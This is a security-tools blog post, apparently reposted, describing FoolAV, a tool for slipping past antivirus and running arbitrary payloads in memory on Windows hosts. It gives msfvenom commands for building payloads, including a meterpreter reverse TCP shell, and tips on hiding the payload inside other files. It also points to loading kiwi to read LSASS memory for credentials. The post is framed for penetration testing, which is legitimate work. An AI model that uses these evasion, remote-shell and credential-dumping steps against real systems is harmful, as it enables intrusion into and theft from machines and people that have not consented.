Home Security Tools FoolAV – Pentest Tool for Antivirus Evasion & Running Arbitrary Payload on Target Wintel Host

FoolAV – Pentest Tool for Antivirus Evasion & Running Arbitrary Payload on Target Wintel Host

by ethhack
FoolAV - Pentest Tool for Antivirus Evasion & Running Arbitrary Payload on Target Wintel Host

FoolAV is a tool for antivirus evasion and running arbitrary payload on target Wintel host.

It is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files:  binary executable  and  payload file  into the same directory.

Usage:

1. Prepare your payload (x86), i.e.

  • calc:  msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b “x00x0ax0dxff” -f c 2>/dev/null | egrep “^”” | tr -d “”n;” >foolav.mf  (you dont really need to use any encoder or characters blacklisting, it will work anyway)
  • meterpreter:  msfvenom -p windows/meterpreter_reverse_tcp LHOST=… -a x86 -f c 2>/dev/null | egrep “^”” | tr -d “”n;” >foolav.mf 

2. Copy payload file  [executable-name-without-exe-extension].mf  in the same directory as executable payload running calc.exe generated using above command:

3. Once executable is run, payload file will be parsed, loaded into separate thread and executed in memory:

Notes:

  • x86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86 architecture payloads. Nevertheless, x86 meterpreter payload can be migrated to x86_64 processes. After that,  load kiwi  will load x86_64 version making it possible to access juicy contents of LSASS process memory 🙂
FoolAV Meterpreter Screenshot
  • .mf payload file can be obfuscated – parser will ignore every character other than  xHH  hexdecimal sequences. This means, it can append your payload to almost any file, hide it between the lines or even add your own comments, example:
FoolAV.mf Screenshot



Source link

Related Articles

Leave a Comment